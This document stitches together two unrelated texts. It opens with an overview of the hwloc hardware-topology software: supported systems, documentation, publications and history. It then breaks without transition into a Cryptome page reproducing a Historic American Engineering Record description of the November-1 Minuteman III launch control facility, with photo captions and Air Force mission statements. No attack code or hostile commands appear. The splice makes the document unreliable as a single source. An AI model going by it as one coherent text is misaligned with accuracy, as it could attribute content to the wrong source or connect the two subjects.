The Portable Hardware Locality ( hwloc ) software package provides a portable abstraction ( across OS , versions , architectures , ... ) of the hierarchical topology of modern architectures , including NUMA memory nodes , sockets , shared caches , cores and simultaneous multithreading .
It also gathers various system attributes such as cache and memory information as well as the locality of I/O devices such as network interfaces , InfiniBand HCAs or GPUs .
hwloc primarily aims at helping applications with gathering information about increasingly complex parallel computing platforms so as to exploit them accordingly and efficiently .
For instance , two tasks that tightly cooperate should probably be placed onto cores sharing a cache .
However , two independent memory - intensive tasks should better be spread out onto different sockets so as to maximize their memory throughput .
As described in this paper , OpenMP threads have to be placed according to their affinities and to the hardware characteristics .
MPI implementations apply similar techniques while also adapting their communication strategies to the network locality as described in this paper or this one .
hwloc may also help many applications just by providing a portable CPU and memory binding API and a reliable way to find out how many cores and / or hardware threads are available .
Portability and support
hwloc supports the following operating systems :
Linux ( including old kernels not having sysfs topology information , with knowledge of cgroups , offline CPUs , ScaleMP vSMP , and NumaScale NumaConnect ) on all supported hardware , including Intel Xeon Phi .
Solaris , AIX and HP-UX
NetBSD , FreeBSD and kFreeBSD / GNU
Darwin / OS X
Microsoft Windows ( either using MinGW , or Cygwin , or a native Visual Studio solution )
IBM BlueGene / Q Compute Node Kernel ( CNK )
Additionally hwloc can detect the locality PCI devices as well as OpenCL , CUDA and Xeon Phi accelerators , network and InfiniBand interfaces , etc .
See the Best of lstopo for more examples of supported platforms .
The topologies of many existing platforms are also available in the XML topology database for testing your software on architectures you do n't have access to .
hwloc may display the topology in multiple convenient formats ( see v2.3.0 examples and the Best of lstopo ) .
It also offers a powerful programming interface to gather information about the hardware , bind processes , and much more .
Since it uses standard Operating System information , hwloc 's support is almost always independent from the processor type ( x86 , powerpc , ia 64 , ... ) , and just relies on the Operating System support .
Whenever the OS does not support topology information ( e.g. some BSDs ) , hwloc uses an x86 - only CPUID - based backend .
To check whether hwloc works on a particular machine , just try to build it and run lstopo or lstopo - no - graphics .
If some things do not look right ( e.g. bogus or missing cache information ) , see Questions and bugs below
Documentation
More details are available in the Documentation ( in both PDF and HTML ) .
The documentation for each version contains examples of outputs and an API interface example ( these links are for v2.3.0 ) .
The materials from several hwloc tutorials are available online .
Getting and using hwloc
hwloc is open - source , available under the BSD license .
The latest hwloc releases are available on the download page .
The GIT repository is also accessible for online browsing or checkout .
hwloc is already available as official packages for many Linux distributions ( at least Debian / Ubuntu , Fedora / RHEL , SUSE , ArchLinux , Slackware , Gentoo and their derivatives ) , as well as NetBSD , FreeBSD , Cygwin , Mac OS X ports , and HP - UX .
It is also available as EasyBuild and Spack packages .
The following langages also have dedicated bindings :
The following software already benefit from hwloc or are being ported to it :
Questions and bugs
Bugs should be reported in the tracker .
Opening a new issue automatically displays lots of hints about how to debug and report issues .
See also the wiki page about Linux kernel bugs ( or BIOS bugs ) affecting locality information in hwloc .
Questions may be sent to the users or developers mailing lists .
There is also a #hwloc IRC channel on Freenode ( irc.freenode.net ) .
Publications
For a general - purpose hwloc citations , please use the following one .
This paper introduces hwloc , its goals and its implementation .
It then shows how hwloc may be used by MPI implementations and OpenMP runtime systems as a way to carefully place processes and adapt communication strategies to the underlying hardware .
François Broquedis , Jérôme Clet - Ortega , Stéphanie Moreaud , Nathalie Furmento , Brice Goglin , Guillaume Mercier , Samuel Thibault , and Raymond Namyst .
hwloc : a Generic Framework for Managing Hardware Affinities in HPC Applications .
In Proceedings of the 18th Euromicro International Conference on Parallel , Distributed and Network - Based Processing ( PDP2010 ) , Pisa , Italia , February 2010 .
IEEE Computer Society Press .
https://hal.inria.fr/inria-00429889
For citing how hwloc deals with new heterogeneous memory hierarchies ( Knights Landing 's MCDRAM , high - bandwidth memory ( HBM ) , non-volatile memory ( NVDIMM ) , etc ) , use this paper :
Brice Goglin .
Exposing the Locality of Heterogeneous Memory Architectures to HPC Applications .
In Proceedings of the First ACM International Symposium on Memory Systems ( MEMSYS16 ) , Washington , DC , USA , October 2016 .
https://hal.inria.fr/hal-01330194
When discussing the overhead of topology discovery and why XML or synthetic topologies are useful , use this paper :
Brice Goglin .
On the Overhead of Topology Discovery for Locality - aware Scheduling in HPC .
In Proceedings of the 25th Euromicro International Conference on Parallel , Distributed and Network - Based Processing ( PDP2017 ) , St Petersburg , Russia , March 2017 .
https://hal.inria.fr/hal-01402755
About the memory footprint of hwloc and the new shmem topology API in hwloc 2.0 :
Brice Goglin .
Memory Footprint of Locality Information on Many - Core Platforms .
In Proceedings of the 6th Workshop on Runtime and Operating Systems for the Many - core Era ( ROME 2018 ) , held in conjunction with IPDPS , Vancouvert , BC , Canada , May 2018 .
https://hal.inria.fr/hal-01644087
For citing hwloc 's I/O device locality and cluster / multi - node support , please use the following one instead .
This paper explains how I/ O locality is managed in hwloc , how device details are represented , how hwloc interacts with other libraries , and how multiple nodes such as a cluster can be efficiently managed .
Brice Goglin .
Managing the Topology of Heterogeneous Cluster Nodes with Hardware Locality ( hwloc ) .
In Proceedings of 2014 International Conference on High Performance Computing & Simulation ( HPCS 2014 ) , Bologna , Italy , July 2014 .
https://hal.inria.fr/hal-00985096
For citing hwloc 's hierarchical modeling of computing , memory and I / O resources as well as multi- node support , use this paper :
Brice Goglin .
Towards the Structural Modeling of the Topology of next - generation heterogeneous cluster Nodes with hwloc .
Inria , November 2016 .
https://hal.inria.fr/hal-01400264
History / credits
hwloc is the evolution and merger of the libtopology and Portable Linux Processor Affinity ( PLPA ) projects .
Because of functional and ideological overlap , these two code bases and ideas were merged and released under the name " hwloc " as an Open MPI sub - project .
hwloc is now mostly developed by the TADaaM team at Inria ( Bordeaux , France ) .
libtopology was initially developed by the Inria Runtime team - project as a way to discover hardware affinities inside the Marcel threading library .
With the advent of multicore machines , this work became interesting for much more than multithreading .
So libtopology was extracted from Marcel and became an independent library .
Portability tests are performed thanks to the Inria Continuous Integration platform .
How do you pronounce " hwloc " ?
When in doubt , say " hardware locality . "
Some of the core developers say " H. W. Loke " ; others say " H. W. Lock " .
We 've heard several other pronunciations as well .
We do n't really have a strong preference for how you say it ; we chose the name for its Google - ability , not its pronunciation .
But now at least you know how we pronounce it . :-)
Donate $ 25 for two DVDs of the Cryptome collection of files from June 1996 to the present Natsios Young Architects 24 May 2010 .
Thanks to N , added Malstrom AFB launch control desk photo .
4 January 2006
Based on current photographs from FE Warren Air Force Base this ICBM launch control facility remains active .
Source : http://www.spacewar.com/images/icbm-underground-launch-control-center-malstrom-mt-afb-desk-1360.jpg
This console appears to be identical to the one below from this report .
http://www.warren.af.mil/gallery/Images/missileer.jpg
From this report :
In the event the officers were called to unleash their missiles , they would take their launch keys and preset authenticators out
of a locked steel box positioned above their computer consoles .
If the orders were determined to be authentic , the officers
would insert the codes they received into the enable panel , insert the keys into the switches , and turn them in unison .
If the launch
command was verified by a second launch control center , a predetermined number of Minuteman missiles would blast out of their
silos and streak toward targets halfway around the world .
( Note " Top Secret " marked on switches below . )
Source : Library of Congress Historic American Engineering Record :
http://memory.loc.gov/ammem/collections/habs_haer/
The Library of Congress provides high - resolution TIFF images of the launch control facility images shown below , each about 20 MB in size .
From FE Warren Air Force
Base web site :
http://www.warren.af.mil/organizations/319MS.shtml
319th Missile Squadron
Our Mission
The 319th Missile Squadron operates and monitors 50 Minuteman III ICBMs from five Missile Alert Facilities ( MAFs ) and their associated underground Launch Control Centers ( LCCs ) spread throughout 3,200 square miles in eastern Wyoming , western Nebraska and northern Colorado .
The MAF provides shelter and work space for facility managers , chefs , maintenance support , and security members .
The LCC is a fully self - sufficient entity with its own air , power and water supplies , providing survivable command and control capabilities throughout a conflict .
A two - officer missile combat crew performs 24 - hour alert duties in hardened underground launch control centers .
A variety of communication systems provide the president and secretary of defense with highly reliable , virtually instantaneous direct command for each launch crew .
The crews monitor the status and security of missiles and maintain proficiency in the execution of emergency war orders .
This team of professional " Screaming Eagles " works rotating shifts , 7 days a week , 365 days a year to ensure a safe , secure and ready strategic deterrent force for our nation .
From this report :
In 1977 , Strategic Air Command initiated the " Rivet Save " program .
The impetus behind Rivet Save was a need to cut back on military spending to accommodate defense budget reductions .
Missile crew positions were targeted for elimination as part of these reductions .
The original missile system had smaller manning requirements than the Minuteman II and III .
The Minuteman I crew force worked on a 24 - hour alert schedule , which was efficient because crews arrived from base for their alert shift , then immediately returned to base after the shift .
Replacement crews also came directly from base , so there was no need for crews to wait for their next alert in the aboveground support building .
Crew members got the rest they needed inside the capsule , taking turns sleeping so the consoles were continuously monitored .
But each modifIcation to the weapon system placed new demands on the missile crews .
Under such conditions , the National Security Agency ( NSA ) felt crew members could no longer be permitted to sleep on their alert shift .
Consequently , the Minuteman II and III force switched to a 36 - hour alert system , whereby each crew would pull a 12 - hour alert , rest aboveground for 12 hours , then pull another l2 - hour alert .
As one crew rested , another crew would man the launch control center .
The system kept a second crew idle in the launch control support building for up to twelve hours at a time .
Under Rivet Save , the NSA agreed to allow a return to the more efficient 24 - hour alert schedule , if measures were taken to increase the security of the missile system against unauthorized launch .
These changes had no impact on the appearance of the launch control support building or the launch control center .
Rather , they involved computer reprogramming coupled with modifications to the coding process and to the enable panel in the launch control centers .
http://www.warren.af.mil/organizations/90OSS.shtml
90th Operations Support Squadron
Our Mission
The 90th Operations Support Squadron provides emergency war order , cryptographic codes , weapon systems and troop support training for the 90th OG .
The squadron is also responsible for targeting and cryptographic codes accuracy for the wing 's 200 ICBMs and provides a $ 1.5 million logistical support function for a 12,600 square - mile missile complex .
It also provides intelligence and weather support to 20th AF and 90th SW and maintains combat - ready crews .
The sections of the 90th OSS consist of the Missile Alert Facility Food Service Operations , Weather Flight , Training Flight , Emergency War Order Section , and Codes Section .
HISTORIC AMERICAN ENGINEERING RECORD
MINUTEMAN III ICBM LAUNCH CONTROL FACILITY NOVEMBER-1
Warren Air Force Base Missile Alert Facility
HAER No. CO - 84
Location : Southeast Weld County , Colorado ; 1.5 miles north of the town of New Raymer and State Highway 14 .
Google Maps
USGS Photo 1998
USGS 7.5 Minute Quad : Raymer NE , Colorado , 1977
UTM Coordinates : 13.598440.4498330
Dates of Construction : 1962 -1964 , as part of Minuteman I system ; 1975 , converted to Minuteman III system
Architect / Engineer : Ralph M. Parsons Company , Los Angeles , California
Builder : Morrison - Knudsen Company , Boise , Idaho
Present Owner : United States Air Force , Warren Air Force Base , Wyoming
Present Use : Command post for the deployment of ten Minuteman III missiles
Significance : Launch Control Facility November - 1 was one of 20 similar installations in " Wing V " of the country 's Minuteman ICBM force .
Land - based ICBMs played a vital role in American strategic policy during the Cold War .
With the Navy 's sea - based ballistic missile fleet and the Air Force 's bomber fleet , they were part of the " Triad , " the three major weapons systems that gave force to the concept of strategic deterrence .
In the name of strategic deterrence , the U.S. Air Force spawned the most deadly weapons yet known and some of the most unique structures in the history of architecture .
Administered by Warren Air Force Base in Cheyenne , Wyoming , Wing V contained 200 of the nation 's 1,000 operational Minuteman missiles .
Field supervision of these nuclear weapons was vested in remote outposts such as Launch Control Facility November - 1 , each responsible for firing ten missiles upon higher command .
By 1975 , the original Minuteman missiles at Wing V were replaced by the Minuteman III .
Longer and more powerful than its predecessors , the Minuteman III was equipped with an improved third - stage motor , which increased the range of the missile , a new post - boost propulsion system for better maneuvering , and an upgraded guidance system that enhanced computer memory and accuracy .
But the missile 's most significant improvement lay in its revolutionary warhead , a multiple independently targeted reentry vehicle ( MIRV ) .
This new warhead could deliver three hydrogen bombs to widely scattered targets , a capability that would " render current and contemplated antimissile defense systems largely inadequate , " and would thus " thrust the world into a new era of weapons for mass destruction . "
Historians : Christine A. Curran and Jeffrey A. Hess , 1997
Project Information : In 1995 , Warren Air Force ( WAFB ) proposed to refurbish its 15 remaining Minuteman III ICBM Launch Control Facilities , which had been declared eligible for listing in the National Register of Historic Places .
To mitigate its actions , WAFB provided funds to the National Park Service to prepare HAER Documentation of a representative facility .
The study was completed under contract by Hess , Roise and Company of Minneapolis .
Jeffrey A. Hess served as Principal Investigator , Christine A. Curran as Project Historian , and Clay Fraser as Project Photographer and Delineator .
1. OVERALL VIEW OF NOVEMBER - 1. VIEW TO EAST .
19 . TUNNEL JUNCTION VESTIBULE .
BLAST DOOR .
VIEW TO WEST .
20 .
TUNNEL JUNCTION .
STACKED EMERGENCY FOOD RATIONS AT LEFT .
LAUNCH CONTROL CAPSULE BLAST DOOR AT CENTER .
VIEW TO NORTHEAST .
21 . LAUNCH CONTROL EQUIPMENT BUILDING .
VIEW TO SOUTH .
22 . LAUNCH CONTROL EQUIPMENT BUILDING .
VIEW TO NORTH .
23 . LAUNCH CONTROL CAPSULE .
BLAST DOOR TO ENTRY .
VIEW TO NORTH .
24 . LAUNCH CONTROL CAPSULE .
ENTRANCE TO ACOUSTICAL ENCLOSURE .
SHOCK ISOLATOR AT FAR LEFT .
VIEW TO NORTH .
25 . LAUNCH CONTROL CAPSULE .
ACOUSTICAL ENCLOSURE WITH MISSILE COMBAT CREW MEMBERS ( FRONT TO BACK ) CAPTAIN JAMES L. KING , JR .
AT LAUNCH CONTROL CONSOLE AND LIEUTENANT KEVIN R. MCCLUNEY AT COMMUNICATIONS CONSOLE .
RADIO TRANSMITTER AND RECEIVER RACKS AT FAR RIGHT ; ELECTRONIC EQUIPMENT RACKS AT FAR LEFT .
VIEW TO NORTH .
26 . LAUNCH CONTROL CAPSULE .
ACOUSTICAL ENCLOSURE WITH MISSILE COMBAT CREW MEMBER LIEUTENANT KEVIN R. MCCLUNEY AT COMMUNICATIONS CONSOLE .
LAUNCH CONTROL CONSOLE IN FOREGROUND .
VIEW TO NORTH .
27 . LAUNCH CONTROL CAPSULE .
ACOUSTICAL ENCLOSURE .
COMMUNICATIONS CONSOLE AT LEFT ; LAUNCH CONTROL CONSOLE AT RIGHT .
PADLOCKED PANEL AT TOP CENTER CONTAINS MISSILE LAUNCH KEYS .
SHOCK ISOLATOR AT FAR LEFT .
VIEW TO EAST .
28 . LAUNCH CONTROL CAPSULE .
ACOUSTICAL ENCLOSURE WITH MISSILE COMBAT CREW MEMBERS ( FRONT TO BACK ) LIEUTENANT KEVIN R. MCCLUNEY AND CAPTAIN JAMES L. KING , JR .
SHOCK ISOLATOR AND ELECTRONIC EQUIPMENT RACK AT FAR LEFT .
VIEW TO SOUTH .
29 . LAUNCH CONTROL CAPSULE .
ACOUSTICAL ENCLOSURE WITH MISSILE COMBAT CREW MEMBERS ( FRONT TO BACK ) LIEUTENANT KEVIN R. MCCLUNEY AND CAPTAIN JAMES L. KING , JR .
AT CONSOLES .
REFRIGERATOR AT RIGHT FLANKED BY RADIO EQUIPMENT ( RIGHT ) AND FILE CABINETS ( LEFT ) .
VIEW TO SOUTHWEST .
30 .
LAUNCH CONTROL CAPSULE .
ACOUSTICAL ENCLOSURE .
OPERATORS ' CHAIR AND COMMUNICATIONS CONSOLE IN FOREGROUND .
ELECTRONIC EQUIPMENT RACK AT LEFT ; LAUNCH CONTROL CONSOLE WITH CAPTAIN JAMES L. KING , JR .
IN CENTER .
LIEUTENANT KEVIN R. MCCLUNEY IN BACKGROUND .
VIEW TO SOUTHEAST .
31 . LAUNCH CONTROL CAPSULE .
LOOKING TOWARD BLAST DOOR AND TUNNEL VESTIBULE .
VIEW TO SOUTH .
2 . LAUNCH CONTROL SUPPORT BUILDING WEST FRONT AND VEHICLE STORAGE BUILDING SOUTHWEST FRONT .
VIEW TO EAST .
3 . LAUNCH CONTROL SUPPORT BUILDING NORTH SIDE AND WEST FRONT .
VIEW TO SOUTHEAST .
4 . LAUNCH CONTROL SUPPORT BUILDING NORTH SIDE AND EAST REAR .
VIEW TO SOUTHWEST .
5 . LAUNCH CONTROL SUPPORT BUILDING SOUTH SIDE .
VIEW TO NORTHWEST .
6 . LAUNCH CONTROL SUPPORT BUILDING .
INTERIOR OF SECURITY OFFICE .
VIEW TO WEST .
7 . LAUNCH CONTROL SUPPORT BUILDING .
INTERIOR OF SECURITY OFFICE .
VIEW TO NORTH .
8 . LAUNCH CONTROL SUPPORT BUILDING .
INTERIOR OF DINING / RECREATION ROOM .
VIEW TO EAST .
9 . LAUNCH CONTROL SUPPORT BUILDING .
INTERIOR OF KITCHEN .
VIEW TO EAST .
10 . LAUNCH CONTROL SUPPORT BUILDING .
INTERIOR OF BEDROOM .
VIEW TO SOUTH .
11 . LAUNCH CONTROL SUPPORT BUILDING .
INTERIOR OF MECHANICAL ROOM .
VIEW TO SOUTHEAST .
12 . LAUNCH CONTROL SUPPORT BUILDING .
INTERIOR OF GENERATOR ROOM .
VIEW TO EAST .
13 . VEHICLE STORAGE BUILDING SOUTHWEST FRONT AND SOUTHEAST SIDE .
VIEW TO NORTHWEST .
Omitted here .
14 . VEHICLE STORAGE BUILDING NORTHWEST SIDE AND NORTHEAST REAR .
VIEW TO SOUTHEAST .
Omitted here .
15 . VEHICLE STORAGE BUILDING INTERIOR .
VIEW TO NORTHWEST .
Omitted here .
16 . FOREGROUND ( LEFT TO RIGHT ) EXHAUST AND INTAKE DUCTS .
SOUTH SIDE AND WEST FRONT OF LAUNCH CONTROL SUPPORT BUILDING IN BACKGROUND .
VIEW TO NORTH .
17 . HARDENED ULTRA-HIGH-FREQUENCY
ANTENNA .
VIEW TO NORTHEAST .
18 . LAUNCH CONTROL SUPPORT BUILDING .
' MISSILE ART ' MURAL PAINTED ON INTERIOR WALL OF ELEVATOR SHAFT .
VIEW TO EAST .
Omitted here .
DESCRIPTION
Missile Field Organization and Layout
In 1963 , Strategic Air Command chose Warren Air Force Base as one of five strategic missile support bases in the country to deploy the Minuteman Intercontinental Ballistic Missile ( ICBM ) system .
Warren was no stranger to the ballistic missile .
In 1957 , the Department of Defense had selected the installation to be the site of the nation 's first ICBM base .
The Atlas ICBM was deployed at the base from 1959 until its deactivation in 1965 .
The 90th Strategic Missile Wing arrived at Warren in 1965 to command and deploy the fifth Minuteman missile wing of the Strategic Air Command .
Through its personnel and facilities , Warren Air Force Base provides the Minuteman program with a variety of vital services , ranging from missile - crew training to missile maintenance to high­ level command decisions .
But the base itself shelters no operational missiles .
Instead , the weapons are deployed in remote missile fields covering 12,600 square miles of Laramie , Goshen , and Platte counties of Wyoming ; Banner , Cheyenne , and Kimball counties of Nebraska ; and Weld and Logan counties of Colorado .
The nation 's Minuteman force is organized as a series of administrative units called " wings . "
Each wing administers either three or four 50 - missile " squadrons . "
Each squadron contains five " flights , " with each flight housing one staffed command post ( " launch control facility " ) and ten unmanned missile silos ( " launch facilities " ) .
Wing V at Warren hosts the 319th , 320th , 321st , and 400th Strategic Missile Squadrons .
The 20 flights in these four squadrons are named in an alphabetical sequence that begins with Alpha , Bravo , Charlie and concludes with Romeo , Sierra , Tango .
At Warren , Flights Alpha - Echo comprise the 319th Squadron , located in Nebraska and Wyoming ; Flights Foxtrot - Juliet make up the 320th Squadron in Nebraska and Colorado ; Flights Kilo - Oscar belong to the 321st Squadron , also in Nebraska and Colorado ; and Flights Papa - Tango form the 400th Squadron , located entirely in Wyoming .
Within each flight , the launch control facility is designated with the numeral " 1 , " and the ten launch facilities with the numerals " 2 " through " 11 . "
A flight 's numbering system corresponds roughly to its geographic layout .
Site 1 occupies a central position , while the remaining sites form a perimeter .
To minimize the damage inflicted by a single enemy warhead , the sites are separated from each other by several miles .
In the perimeter arrangement at Warren , Site 2 is always on the north , with Sites 3 through 11 positioned , clockwise , in numerically ascending order .
For brevity , Minuteman personnel often refer to missile - field facilities in simple alpha-numeric terms : A - 1 , N - 7 , K - 11 .
November Flight
Located in sparsely populated Weld County , Colorado , November Flight occupies the extreme southwest corner of the Minuteman " missile farm " administered by Warren Air Force Base .
The November Flight missile field is roughly rectangular in shape , measuring approximately 23 miles east - west by 13 miles north - south .
State Highway 44 cuts through the southern third of the missile field on an east - west course , while tracks of the Burlington Northern Railroad arc gently through the area , southeast to northwest .
Visitors to November Flight look out at a high plains landscape of northeastern Colorado , a semi-arid region of rolling grasslands dotted by ranches and small trade centers .
Minuteman construction activities began at November Flight in October 1962 , a month after the first ground was broken at the missile farm at Alpha Flight , approximately 50 miles to the northwest .
Construction was completed in April 1964 and November Flight became fully operational in April 1965 .
In design , layout , and construction , the facilities at November Flight are representative of the other 19 Minuteman flights associated with Warren Air Force Base .
The November missile field contains a centrally located Launch Control Facility ( Site N - 1 ) and ten perimeter Launch Facilities ( Sites N - 2 through N - 11 ) , which contain the actual missiles .
Communication between the November Launch Control Facility and all other facilities in the 321st Squadron is facilitated by a 2,300 - mile , buried , Hardened Intersite Cable System .
This network gives Site N - 1 the capability of launching not only the November Flight missiles , but all other missiles in the squadron as well , in the event that other launch control facilities were to be disabled by malfunction or enemy attack .
Commercial telephone lines , land - line networks , and radio transmission systems provide Site N - 1 with additional communication options , ensuring that command channels will remain open even if a specific system is lost .
November Launch Control Facility ( Site N - 1 )
Situated about 70 air miles southeast of Warren Air Force Base , the Launch Control Facility for November Flight occupies a level 5.85 - acre tract , set off from the surrounding grasslands by a barbed , chain - link perimeter fence .
The site stands on the south rim of the South Pawnee Creek Valley , at an elevation of 4,790 feet .
The closest town is New Raymer , Colorado , on State Highway 44 , about 1.5 miles to the south .
Overland access to the Launch Control Facility is by way of a graveled road , maintained by Weld County , that passes the west side of the site .
A paved driveway , approximately 1,100 feet in length , leads eastward from the county road to an electrically operated sliding gate , which marks the entrance to Launch Control Facility N - 1 .
Site N - 1 is the only manned facility in the November missile field .
Its primary mission is to keep personnel and equipment in a state of readiness to launch the missiles of November Flight upon appropriate higher command .
To fulfill its mission , Site N - 1 constantly monitors the status of missile - field equipment and command communication from Warren Air Force Base .
It also provides on - site personnel with support services , including food , lodging , and security .
The November Launch Control Facility is a compact complex of aboveground and belowground buildings and structures .
Despite several modifications since the completion of original construction in 1964 , the site still recalls its original appearance .
Since these modifications occurred at all of the Minuteman missile fields associated with Warren Air Force Base , Site N - 1 also resembles the other 19 launch control facilities at the installation .
The primary features of the complex are listed below and are described in detail in subsequent paragraphs .
The first three features in the list share integral construction , but for administrative and functional reasons they are traditionally treated as discrete entities .
Launch Control Support Building Launch Control Center
Launch Control Equipment Building Vehicle Storage Building
Hard Ultra -High - Frequency Antenna Hard High - Frequency Receive Antenna
Soft High - Frequency Transmit- Receive Antenna
ICBM Super - High - Frequency Satellite Terminal Antenna
Survivable Low - Frequency Communications System Antenna
Helicopter Pad
Sewage Lagoon
Primary Features
Launch Control Support Building
The most prominent feature at the Launch Control Facility is the Launch Control Support Building .
Structurally , the building is the aboveground extension of a blast - hardened , subterranean complex consisting of the Launch Control Center and the Launch Control Equipment Building ( see descriptions in following sections ) .
The Launch Control Support Building serves as a security center for the entire November Flight and provides accommodations for the eight - person contingent assigned to the premises in three - day shifts .
The staff consists of two flight security controllers , two two - person armed security teams , a cook , and a facility manager .
The Support Building is a one - story , side - gabled ranch - style building with a low - pitched roof and an asymmetrical footprint .
The 33 '- wide gable end faces the sliding entrance gate , almost immediately to the west .
The 124 ' - long primary facade faces north , overlooking a circular parking area .
The Support Building is built of light wood frame construction on a concrete - pad foundation .
The roof is covered with asphalt shingles which terminate at tight , open eaves with metal gutters .
A narrow vergeboard trims the gable ends .
The building is sheathed with horizontal steel siding in a wide - lap weatherboard style .
Complete with corner boards and stamped with a wood grain texture , this siding replaced the original asbestos - cementitious ( Transite ) shingles in the mid-1980s .
A recessed entry on the north side ( front ) of the building shelters the primary entrance .
A windbreak wall was added to further enclose the main door in the mid-1980s .
All five door openings on the north side are original , as is the rest of the fenestration .
Typical window openings hold one - over - one - light , double - hung , vinyl - clad wood sash glazed with insulating glass .
These windows replaced the original one - over - one - light , double - hung wood sash in the early 1990s .
The windows are grouped in pairs on the east end , and in a ribbon of six on the west end .
On the gabled west end of the building , a partial - width , gabled bay extends 4 ' - 6 " beyond the main portion of the building .
This end contains the security office , a function indicated by a bank of large windows prominently facing the sliding electric entry gate .
On the main portion of the west end , a double overhead door was replaced by a pair of windows in the mid-l980s , when the interior space was converted from a garage to a bedroom .
There are two original door openings still in use on this side of the building .
On the south side ( rear ) of the building , the fenestration is grouped in pairs and ribbons of three .
A 10 '- wide lean - to breaks the south facade at the west end , sheltered under the gable of the main roof .
The east end of the building has no door or window openings .
A pad of concrete has been poured at this end in anticipation of a four­bedroom addition scheduled for completion in 1997 .
The roof of the Support Building is pierced by ventilators , a boiler stack , a personnel hatch , and several exhaust fans .
Floodlights are attached at the eaves at various intervals around the building .
The Support Building is painted a cream color with dark brown trim on the doors and eaves .
The main entrance of the Support Building opens into a vestibule and short hallway , which provides entry into the security office to the west before terminating at the dining / recreation room .
The dining / recreation room is large , with eight windows fronting south .
The kitchen is located at the east end of the dining room .
Also at the east end is an entrance to a corridor leading to five bedrooms , two latrines , and a utility room , which contains laundry facilities .
Bedrooms and latrines in these spaces were modified in the mid-1980s to accommodate the addition of women crew members .
Behind the north wall of the dining / recreation room are located the water treatment room and the telephone equipment room .
The water treatment room contains a pump installation and other water processing equipment .
Each launch control facility requires approximately 2,000 gallons of water per day for drinking , cooking , bathing , boiler feed - water , and sanitary purposes .
Reserve storage of at least 4,500 gallons is maintained at all times for emergency fire fighting .
November - 1 draws water from a well that is 1,188 feet deep .
As at other Minuteman launch control facilities , the use of a deep well is intended to protect water quality from enemy actions .
The telephone equipment room contains the telephone termination equipment for the Support Information Network , which is used primarily for the transmission of non-sensitive communications between various locations in the Minuteman wings .
Installed and serviced by a commercial telephone company , the network commonly handles traffic dispatch for maintenance , security , housekeeping , and administrative personnel .
The west end of the dining / recreation room provides direct access to a sixth bedroom .
Another modification of the mid-1980s , this room was originally a two - vehicle garage .
Directly south , behind the bedroom wall , is an 8'x10 ' lean - to , used as a generator room .
To the north of the bedroom is an elevator shaft and an adjoining corridor , which leads north to the security office .
The elevator is the heart of the Support Building .
It provides access for the two missile combat crew members pulling their 24 - hour shift in the blast - proof Launch Control Center , approximately 50 feet below the surface .
Launch Control Center
The most important component of any Launch Control Facility is the underground capsule called the Launch Control Center .
The Launch Control Center is a blast - proof , steel - reinforced concrete capsule within which is suspended a rectangular room called the " acoustical enclosure . "
The acoustical enclosure contains the equipment required for the monitoring and launching of the ten missiles in November Flight .
It also contains life support equipment and minimal accommodations for two duty officers known as the commander and the deputy commander .
With a diameter of 29 feet , a length of 54 feet , and walls four feet thick , the concrete capsule provides the enclosure with a protective shell .
The acoustical enclosure measures approximately 12 feet wide and 31 feet long .
It sits on a steel - framed platform , officially known as an electrical­ mechanical equipment base .
To reduce shocks from earthquakes or nuclear attacks , the enclosure is mounted in a shock - absorbing system .
One set of shock absorbers ( isolators ) carries the weight of the acoustical enclosure .
These four isolators , located near each corner of the enclosure , hang from heavy chains attached to the ceiling of the capsule .
The shock isolators limit the vertical movement of the enclosure platform .
A second set of shock absorbing devices , called sway dampers , controls the horizontal movement of the platform and are located beneath the acoustical enclosure .
The walls and ceiling of the acoustical enclosure are made of hollow , perforated steel panels filled with sound - absorbing material .
The floor is made of removable steel plates covered with sheet vinyl and carpet .
Compartments beneath the floor contain survival equipment , emergency batteries , and a motor generator .
Four recessed florescent lighting panels centered in the ceiling illuminate the interior of the enclosure .
A beige fabric liner , attached to the ceiling framework on either side of the light panels , was added in 1988 to cover wiring and cables and to help reduce noise inside the enclosure .
Lining the west wall of the enclosure are heavy aluminum electronic racks containing computer equipment , radio transmitters and receivers , a telephone relay system , and a power control panel .
Equipment racks , panels , and shelving are painted in various shades of gray , pale green , and cream .
The enclosure is air - conditioned to remove heat from the electronic equipment racks , as well as to maintain a comfortable climate for the crew on duty .
In addition to air - conditioning , the enclosure is equipped with an emergency life support system .
Outdoor air can be brought in through a chemical - bacteriological - radiological fIlter , or , if automatic blast valves shut off the outside air supply , oxygen can be regenerated using a hand - pumped unit stored within the capsule .
A chilled brine tank located at one end of the enclosure is used for emergency air conditioning .
Primary and standby electrical power are provided either commercially or by a standby generator .
Emergency power is supplied by a storage battery set .
The acoustical enclosure is also equipped with a stainless steel latrine , a small refrigerator / microwave oven unit , and a curtained sleeping compartment located at the north end .
Located along the east side of the enclosure are two desk - like consoles .
Positioned in front of each console is a swiveling , high - backed operator 's chair , fitted with a seat belt and shoulder harness .
Both chairs are anchored on a pair of rails running several feet along the length of the enclosure .
This arrangement provides the console operators with easy access to the myriad of components located at the consoles .
The original consoles , equipped with 1960s - era computer technology , were replaced in 1993 - 1994 with updated consoles and hardware .
The two consoles serve different functions .
The launch control console allows the commander to continually monitor the operational and security status of each of the ten missiles in November Flight .
Next to the launch control console is the deputy commander 's communications control console .
It contains the radio and telephone equipment that enables the crew to communicate with other launch control facilities , base headquarters , and the Strategic Air Command .
At the side of each console is a small panel containing a spring - loaded , key - operated launch switch .
The keys to these switches are kept in a double - padlocked , steel box mounted above the deputy commander 's console .
The two consoles are space sufficiently apart to prohibit a single crew member from activating the missiles on his or her own .
Access to and from the Launch Control Center is provided by an opening at the south end of the capsule .
The opening is protected by an eight - ton blast door .
Designed primarily to withstand the effects of nuclear blast and to provide an environmental seal , the blast door is constructed of welded steel shells filled with concrete grout .
Launch Control Equipment Building
Equipment located in the underground Launch Control Equipment Building provides environmental control and power required to make the Launch Control Center self - sufficient during the prolonged periods of isolation that could occur after a nuclear attack .
The Equipment Building is a blast - hardened structure of steel and reinforced concrete , but it is not a cylinder with rounded ends like the Launch Control Center .
It is a flat - bottomed structure with sloping sides , a rounded top , and flat ends .
The equipment it contains is supported by a floor suspended on 12 coil - spring shock isolators .
There are no sway dampers as in the Launch Control Center .
Since the Equipment Building is manned only during relatively short periods of equipment maintenance , it is not fitted with a blast door .
The Equipment Building at November - 1 is aligned with the Launch Control Center on a common axis .
Together , they are located perpendicular to the aboveground Support Building , underneath its west end .
This alignment differs from Minuteman Wings I and II , where only the launch control centers are located underground , and the launch control equipment buildings are aboveground , operating out of the support building .
The difference in these two designs was the result of a strategic policy change instituted during the early days of the Kennedy administration .
Air Force historian Clyde Littlefield explains :
